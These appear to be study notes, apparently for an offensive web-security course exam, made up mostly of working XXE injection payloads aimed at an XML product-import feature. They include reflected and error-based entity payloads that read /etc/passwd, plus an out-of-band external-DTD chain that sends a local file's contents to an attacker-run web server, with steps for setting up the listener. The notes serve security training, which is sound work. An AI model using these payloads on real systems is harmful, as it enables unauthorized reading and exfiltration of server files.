Useful Payloads

1. If you want to escape < and > inside your XML data, include the whole data inside:
<![CDATA[ content that contains < or > ]]>

2. Type of XML Entities:
Internal - <!ENTITY test "<entity-value>test value</entity-value>"> or <!ENTITY test "value">
Private External (private because of SYSTEM) - <!ENTITY offsecinfo SYSTEM "http://www.offsec.com/company.xml">
Public External (public because of PUBLIC) - <!ENTITY offsecinfo PUBLIC "-//W3C//TEXT companyinfo//EN" "http://www.offsec.com/companyinfo.xml">
Parameter (solely within a DTD, in this example %course; can be used to refer to WEB 200) - <!ENTITY % course 'WEB 200'>

3. Results Directly Reflected:

Original:

<?xml version="1.0" encoding="UTF-8"?><entity-engine-xml>     <Product createdStamp="2021-06-29 16:01:57.355" createdTxStamp="2021-06-29 16:01:55.979" description="Giant Widget with Wheels" internalName="Giant Widget variant explosion" isVariant="N" isVirtual="Y" largeImageUrl="/images/products/WG-9943/large.png" lastUpdatedStamp="2021-06-29 16:02:40.282" lastUpdatedTxStamp="2021-06-29 16:02:40.019" longDescription="This giant widget is mobile. It will seat one person safely. The wheels will never rust or break. Quite a unique item." primaryProductCategoryId="202" productId="WG-9943" productName="Giant Widget with variant explosion" productTypeId="FINISHED_GOOD" productWeight="22.000000" quantityIncluded="10.000000" smallImageUrl="/images/products/WG-9943/small.png" virtualVariantMethodEnum="VV_VARIANTTREE"/>     <Product createdStamp="2021-06-29 16:01:57.985" createdTxStamp="2021-06-29 16:01:55.979" description="Black Giant Widget with 3 Wheels" internalName="Giant Widget B3" isVariant="Y" isVirtual="N" lastUpdatedStamp="2021-06-29 16:02:09.366" lastUpdatedTxStamp="2021-06-29 16:02:02.981" longDescription="This giant widget is mobile. It will seat one person safely. The wheels will never rust or break. Quite a unique item." primaryProductCategoryId="202" productId="WG-9943-B3" productName="Giant Widget B3" productTypeId="FINISHED_GOOD" productWeight="22.000000" quantityIncluded="10.000000"/>     <Product createdStamp="2021-06-29 16:01:59.09" createdTxStamp="2021-06-29 16:01:55.979" internalName="Round Gizmo" isVariant="N" isVirtual="N" largeImageUrl="/images/products/GZ-2644/large.png" lastUpdatedStamp="2021-06-29 16:02:32.639" lastUpdatedTxStamp="2021-06-29 16:02:32.431" longDescription="A small round gizmo with multi-colored lights. Works great in the dark. Small and compact." primaryProductCategoryId="101" productId="GZ-2644" productTypeId="FINISHED_GOOD" productWeight="7.000000" quantityIncluded="100.000000" smallImageUrl="/images/products/GZ-2644/small.png"/> </entity-engine-xml> 

Modified:

<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY xxe "Vulnerable to XXE">
]><entity-engine-xml><Product createdStamp="2021-06-29 16:01:57.355" createdTxStamp="2021-06-29 16:01:55.979" description="Giant Widget with Wheels" internalName="Giant Widget variant explosion" isVariant="N" isVirtual="Y" largeImageUrl="/images/products/WG-9943/large.png" lastUpdatedStamp="2021-06-29 16:02:40.282" lastUpdatedTxStamp="2021-06-29 16:02:40.019" primaryProductCategoryId="202" productId="TEST-1234" productName="Giant Widget with variant explosion" productTypeId="FINISHED_GOOD" productWeight="22.000000" quantityIncluded="10.000000" smallImageUrl="/images/products/WG-9943/small.png" virtualVariantMethodEnum="VV_VARIANTTREE"><longDescription>&xxe;</longDescription></Product></entity-engine-xml> 

Modified the following:
a. First line <?xml....> is optional therefore removed.
b. Added <!DOCTYPE data [, <!ELEMENT data ANY > and <!ENTITY xxe "Vulnerable to XXE">.
c. Removed longDescription from the Product tag and separately use a new longDescription tag so that can use &xxe; to inject.
d. Removed the forward slash (/) at the end of Product tag and close the Product tag manually using </Product> so that longDescription is included inside Product tag.

To change it so that we can access local file, just need to change <!ENTITY xxe "Vulnerable to XXE"> to:
<!ENTITY xxe SYSTEM "file:///etc/passwd">

4. Error based (usually is the value too long or weird for the parameter, can try change other parameter if no error):

<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY xxe  SYSTEM "file:///etc/passwd">
]>
<entity-engine-xml>
<Product createdTxStamp="2021-06-04 08:15:48.983" internalName="Giant Widget variant explosion" isVariant="N" isVirtual="Y" largeImageUrl="/images/products/WG-9943/large.png" lastUpdatedStamp="2021-06-04 08:16:18.521" lastUpdatedTxStamp="2021-06-04 08:16:18.258" primaryProductCategoryId="202" productId="XXE-0001" productName="Giant Widget with variant explosion" productTypeId="FINISHED_GOOD" productWeight="22.000000" quantityIncluded="10.000000" smallImageUrl="/images/products/WG-9943/small.png" virtualVariantMethodEnum="VV_VARIANTTREE">
<createdStamp>2021-06-04 08:15:49</createdStamp>
<description>&xxe;</description>
<longDescription>XXE</longDescription>
</Product>
</entity-engine-xml>

Alternative error based:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

5. Out of band:

a. Create a file name external.dtd:

<!ENTITY % content SYSTEM "file:///etc/timezone">
<!ENTITY % external "<!ENTITY &#37; exfil SYSTEM 'http://your ip address/out?%content;'>" >

b. At the vulnerable page (the parameter entity %base, %external etc must be left within DOCTYPE):

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE oob [
<!ENTITY % base SYSTEM "http://your ip address/external.dtd"> 
%base;
%external;
%exfil;
]>
<entity-engine-xml>
</entity-engine-xml>

c. Copy the external.dtd to /var/www/html, and then sudo systemctl start apache2, after that sudo tail /var/log/apache2/access.log to see the results

6. Exam? Try file:///proof.txt